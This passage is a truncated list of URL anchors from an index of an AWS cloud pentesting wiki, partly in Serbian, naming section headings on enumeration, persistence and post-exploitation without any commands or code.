d/aws-security/index.html#aws-pentesting","pentesting-cloud/aws-security/index.html#osnovne-informacije","pentesting-cloud/aws-security/index.html#laboratorije-za-učenje","pentesting-cloud/aws-security/index.html#aws-pentesterred-team-metodologija","pentesting-cloud/aws-security/index.html#osnovna-enumeracija","pentesting-cloud/aws-security/index.html#ssrf","pentesting-cloud/aws-security/index.html#whoami","pentesting-cloud/aws-security/index.html#org-enumeration","pentesting-cloud/aws-security/index.html#iam-enumeration","pentesting-cloud/aws-security/index.html#services-enumeration-post-exploitation--persistence","pentesting-cloud/aws-security/index.html#privilege-escalation","pentesting-cloud/aws-security/index.html#publicly-exposed-services","pentesting-cloud/aws-security/index.html#compromising-the-organization","pentesting-cloud/aws-security/index.html#from-the-rootmanagement-account","pentesting-cloud/aws-security/index.html#automated-tools","pentesting-cloud/aws-security/index.html#recon","pentesting-cloud/aws-security/index.html#privesc--exploiting","pentesting-cloud/aws-security/index.html#revizija","pentesting-cloud/aws-security/index.html#kontinuirana-revizija","pentesting-cloud/aws-security/index.html#debug-zabeleži-aws-cli-zahteve","pentesting-cloud/aws-security/index.html#reference","pentesting-cloud/aws-security/aws-basic-information/index.html#aws---osnovne-informacije","pentesting-cloud/aws-security/aws-basic-information/index.html#hijerarhija-organizacije","pentesting-cloud/aws-security/aws-basic-information/index.html#računi","pentesting-cloud/aws-security/aws-basic-information/index.html#organizacione-jedinice","pentesting-cloud/aws-security/aws-basic-information/index.html#service-control-policy-scp","pentesting-cloud/aws-security/aws-basic-information/index.html#arn","pentesting-cloud/aws-security/aws-basic-information/index.html#iam---upravljanje-identitetom-i-pristupom","pentesting-cloud/aws-security/aws-basic-information/index.html#aws-account-root-user","pentesting-cloud/aws-security/aws-basic-information/index.html#iam-users","pentesting-cloud/aws-security/aws-basic-information/index.html#mfa---višefaktorska-autentifikacija","pentesting-cloud/aws-security/aws-basic-information/index.html#iam-korisničke-grupe","pentesting-cloud/aws-security/aws-basic-information/index.html#iam-uloge","pentesting-cloud/aws-security/aws-basic-information/index.html#privremeni-kredencijali-u-iam","pentesting-cloud/aws-security/aws-basic-information/index.html#politike","pentesting-cloud/aws-security/aws-basic-information/index.html#iam-granice","pentesting-cloud/aws-security/aws-basic-information/index.html#politike-sesije","pentesting-cloud/aws-security/aws-basic-information/index.html#identitetna-federacija","pentesting-cloud/aws-security/aws-basic-information/index.html#iam-identitetni-centar","pentesting-cloud/aws-security/aws-basic-information/index.html#cross-account-trusts-and-roles","pentesting-cloud/aws-security/aws-basic-information/index.html#aws-simple-ad","pentesting-cloud/aws-security/aws-basic-information/index.html#ostale-iam-opcije","pentesting-cloud/aws-security/aws-basic-information/index.html#iam-id-prefiksi","pentesting-cloud/aws-security/aws-basic-information/index.html#preporučene-dozvole-za-reviziju-naloga","pentesting-cloud/aws-security/aws-basic-information/index.html#razno","pentesting-cloud/aws-security/aws-basic-information/index.html#cli-autentifikacija","pentesting-cloud/aws-security/aws-basic-information/index.html#reference","pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.html#aws---zloupotreba-federacije","pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.html#saml","pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.html#oidc---zloupotreba-github-akcija","pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.html#the-workflow-should-only-trigger-on-pull-requests-to-the-main-branch","pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.html#required-to-get-the-id-token-that-will-be-used-for-oidc","pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.html#crate-an-eks-cluster-10min","pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.html#create-an-identity-provider-for-an-eks-cluster","pentesting-cloud/aws-security/aws-permissions-for-a-pentest.html#aws---dozvole-za-pentest","pentesting-cloud/aws-security/aws-persistence/index.html#aws---persistencija","pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.html#aws---api-gateway-persistence","pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.html#api-gateway","pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.html#resource-policy","pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.html#modify-lambda-authorizers","pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.html#iam-permissions","pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.html#api-keys","pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.html#aws---cognito-persistence","pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.html#cognito","pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.html#održavanje-korisnika","pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.html#cognito-idpsetriskconfiguration","pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.html#aws---dynamodb-persistencija","pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.html#dynamodb","pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.html#dynamodb-okidači-sa-lambda-backdoor-om","pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.html#dynamodb-kao-c2-kanal","pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.html#aws---ec2-persistence","pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.html#ec2","pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.html#praćenje-veze-sigurnosne-grupe","pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.html#ec2-menadžer-životnog-ciklusa","pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.html#zakazane-instance","pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.html#spot-fleet-zahtev","pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.html#backdoor-instance","pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.html#backdoor-konfiguracija-pokretanja","pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.html#vpn","pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.html#vpc-peering","pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.html#aws---ecr-persistence","pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.html#ecr","pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.html#sakrivena-docker-slika-sa-zloćudnim-kodom","pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.html#politika-repozitorijuma","pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.html#politika-registra-i-replikacija-između-naloga","pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.html#aws---ecs-persistencija","pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.html#ecs","pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.html#sakrivena-periodična-ecs-zadatak","pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.html#backdoor-kontejner-u-postojećoj-ecs-definiciji-zadatka","pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.html#nedokumentovana-ecs-usluga","pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.html#aws---elastic-beanstalk-persistence","pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.html#elastic-beanstalk","pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.html#održavanje-u-instanci","pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.html#backdoor-u-verziji","pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.html#nova-verzija-sa-backdoor-om","pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.html#zloupotreba-prilagođenih-resursnih-lifecycle-hooks","pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.html#aws---efs-persistence","pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.html#efs","pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.html#izmenite-politiku-resursa--sigurnosne-grupe","pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.html#kreirajte-pristupnu-tačku","pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.html#aws---iam-persistencija","pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.html#iam","pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.html#uobičajena-iam-persistencija","pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.html#politike-poverenja-za-backdoor-uloge","pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.html#politika-zadnjih-vrata","pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.html#zadnja-vrata--kreiraj-provajdera-identiteta","pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.html#aws---kms-persistencija","pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.html#kms","pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.html#dodeljivanje-pristupa-putem-kms-politika","pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.html#večna-dodela","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/index.html#aws---lambda-persistence","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/index.html#lambda","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/index.html#lambda-layer-persistence","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/index.html#lambda-extension-persistence","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/index.html#via-resource-policies","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/index.html#versions-aliases--weights","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/index.html#version-backdoor--api-gateway","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/index.html#cronevent-actuator","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.html#aws---zloupotreba-lambda-ekstenzija","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.html#lambda-ekstenzije","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.html#eksterni-ekstenzija-za-održavanje-krađu-zahteva-i-modifikaciju-zahteva","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.html#reference","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.html#aws---lambda-layers-persistence","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.html#lambda-layers","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.html#python-load-path","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.html#učitane-biblioteke","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.html#lambda-layer-backdooring","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.html#spoljni-layers","pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.html#aws---lightsail-persistence","pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.html#lightsail","pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.html#preuzmite-ssh-ključeve-instance-i-lozinke-za-db","pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.html#backdoor-instance","pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.html#dns-postojanost","pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.html#aws---rds-persistencija","pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.html#rds","pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.html#omogućite-javni-pristup-instanci-rdsmodifydbinstance","pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.html#kreirajte-admin-korisnika-unutar-db","pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.html#učinite-snimak-javnim","pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.html#aws---s3-persistencija","pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.html#s3","pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.html#kms-klijentska-enkripcija","pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.html#korišćenje-s3-acl-a","pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.html#aws---sns-persistence","pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.html#sns","pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.html#persistence","pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.html#kreirajte-pretplatnike","pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.html#aws---održavanje-u-secrets-manager-u","pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.html#secrets-manager","pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.html#putem-politika-resursa","pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.html#putem-lambda-rotacije-tajni","pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.html#aws---sqs-persistence","pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.html#sqs","pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.html#korišćenje-politike-resursa","pentesting-cloud/aws-security/aws-persistence/aws-ssm-perssitence.html#aws---ssm-persistencija","pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.html#aws---step-functions-persistence","pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.html#step-functions","pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.html#backdooring-step-funkcija","pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.html#backdooring-aliasa","pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.html#aws---sts-persistence","pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.html#sts","pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.html#assume-role-token","pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.html#role-chain-juggling","pentesting-cloud/aws-security/aws-post-exploitation/index.html#aws---post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.html#aws---api-gateway-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.html#api-gateway","pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.html#pristup-neizloženim-api-ima","pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.html#obilaženje-request-body-passthrough","pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.html#usage-plans-dos","pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.html#apigatewayupdategatewayresponse-apigatewaycreatedeployment","pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.html#apigatewayupdatestage-apigatewaycreatedeployment","pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.html#apigatewayputmethodresponse-apigatewaycreatedeployment","pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.html#apigatewayupdaterestapi-apigatewaycreatedeployment","pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.html#apigatewaycreateapikey-apigatewayupdateapikey-apigatewaycreateusageplan-apigatewaycreateusageplankey","pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.html#aws---cloudfront-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.html#cloudfront","pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.html#man-in-the-middle","pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/index.html#aws---codebuild-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/index.html#codebuild","pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/index.html#proverite-tajne","pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/index.html#zloupotreba-pristupa-codebuild-repo-u","pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/index.html#otkriće-pristupnih-tokena-iz-aws-codebuild","pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/index.html#codebuilddeleteproject","pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/index.html#codebuildtagresource--codebuilduntagresource","pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/index.html#codebuilddeletesourcecredentials","pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.html#aws-codebuild---token-leakage","pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.html#oporavak-konfigurisanih-tokena-za-githubbitbucket","pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.html#putem-docker-slike","pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.html#via-insecuressl","pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.html#putem-http-protokola","pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.html#aws---kontrolna-kula-post-eksploatacija","pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.html#kontrolna-kula","pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.html#omogućite--onemogućite-kontrole","pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.html#aws---dlm-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.html#data-lifecycle-manger-dlm","pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.html#ec2describevolumes-dlmcreatelifecyclepolicy","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#aws---dynamodb-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#dynamodb","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#dynamodbbatchgetitem","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#dynamodbgetitem","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#dynamodbquery","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#dynamodbscan","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#dynamodbpartiqlselect","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#dynamodbexporttabletopointintimedynamodbupdatecontinuousbackups","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#dynamodbcreatetable-dynamodbrestoretablefrombackup-dynamodbcreatebackup","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#dynamodbputitem","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#dynamodbupdateitem","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#dynamodbdeletetable","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#dynamodbdeletebackup","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#dynamodbstreamspecification-dynamodbupdatetable-dynamodbdescribestream-dynamodbgetsharditerator-dynamodbgetrecords","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#aws---ec2-ebs-ssm--vpc-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#ec2--vpc","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#malicious-vpc-mirror----ec2describeinstances-ec2runinstances-ec2createsecuritygroup-ec2authorizesecuritygroupingress-ec2createtrafficmirrortarget-ec2createtrafficmirrorsession-ec2createtrafficmirrorfilter-ec2createtrafficmirrorfilterrule","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#copy-running-instance","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#ebs-snapshot-dump","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#data-exfiltration","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#open-security-group","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#privesc-to-ecs","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#remove-vpc-flow-logs","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#ssm-port-forwarding","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#share-ami","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#pretraživanje-osetljivih-informacija-u-javnim-i-privatnim-ami-ima","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#podeli-ebs-snapshot","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#ebs-ransomware-poc","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.html#aws---ebs-snapshot-dump","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.html#provera-snimka-lokalno","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.html#proveravanje-snimka-u-aws-u","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.html#proveravanje-snimka-u-aws-koristeći-cli","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.html#shadow-copy","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.html#references","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-malicious-vpc-mirror.html#aws---malicious-vpc-mirror","pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.html#aws---ecr-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.html#ecr","pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.html#prijava-preuzimanje--postavljanje","pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.html#ecrputlifecyclepolicy--ecrdeleterepository--ecr-publicdeleterepository--ecrbatchdeleteimage--ecr-publicbatchdeleteimage","pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.html#aws---ecs-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.html#ecs","pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.html#host-iam-roles","pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.html#privesc-to-node-to-steal-other-containers-creds--secrets","pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.html#ukrao-osetljive-informacije-iz-ecr-kontejnera","pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.html#aws---efs-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.html#efs","pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.html#elasticfilesystemdeletemounttarget","pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.html#elasticfilesystemdeletefilesystem","pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.html#elasticfilesystemupdatefilesystem","pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.html#elasticfilesystemcreateaccesspoint-i-elasticfilesystemdeleteaccesspoint","pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.html#aws---eks-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.html#eks","pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.html#enumerate-the-cluster-from-the-aws-console","pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.html#connect-to-aws-kubernetes-cluster","pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.html#od-aws-do-kubernetes","pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.html#od-kubernetes-do-aws","pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.html#dobijanje-api-server-endpoint-a-iz-jwt-tokena","pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.html#bypass-cloudtrail","pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.html#eks-ransom","pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.html#aws---elastic-beanstalk-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.html#elastic-beanstalk","pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.html#elasticbeanstalkdeleteapplicationversion","pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.html#elasticbeanstalkterminateenvironment","pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.html#elasticbeanstalkdeleteapplication","pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.html#elasticbeanstalkswapenvironmentcnames","pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.html#elasticbeanstalkaddtags-elasticbeanstalkremovetags","pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.html#aws---iam-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.html#iam","pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.html#problem-zbunjenog-zamenika","pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.html#neočekivana-poverenja","pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.html#references","pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.html#aws---kms-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.html#kms","pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.html#enkriptovanjedekriptovanje-informacija","pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.html#kms-ransomware","pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.html#generic-kms-ransomware","pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.html#destroy-keys","pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/index.html#aws---lambda-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/index.html#lambda","pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/index.html#ukrasti-http-zahteve-drugih-lambda","pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/index.html#ukrasti-http-zahteve-drugih-lambda--zahteve-ekstenzija","pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.html#aws---ukradi-lambda-zahteve","pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.html#lambda-tok","pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.html#ukradanje-lambda-zahteva","pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.html#koraci-napada","pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.html#reference","pentesting-cloud/aws-security/aws-post-exploitation/aws-lightsail-post-exploitation.html#aws---lightsail-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-lightsail-post-exploitation.html#lightsail","pentesting-cloud/aws-security/aws-post-exploitation/aws-lightsail-post-exploitation.html#vratite-stare-db-snimke","pentesting-cloud/aws-security/aws-post-exploitation/aws-lightsail-post-exploitation.html#vratite-snimke-instance","pentesting-cloud/aws-security/aws-post-exploitation/aws-lightsail-post-exploitation.html#pristupite-osetljivim-informacijama","pentesting-cloud/aws-security/aws-post-exploitation/aws-organizations-post-exploitation.html#aws---organizacije-post-eksploatacije","pentesting-cloud/aws-security/aws-post-exploitation/aws-organizations-post-exploitation.html#organizacije","pentesting-cloud/aws-security/aws-post-exploitation/aws-organizations-post-exploitation.html#napusti-org","pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.html#aws---rds-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.html#rds","pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.html#rdscreatedbsnapshot-rdsrestoredbinstancefromdbsnapshot-rdsmodifydbinstance","pentesting-cloud/aws-security/aws-post-exploitatio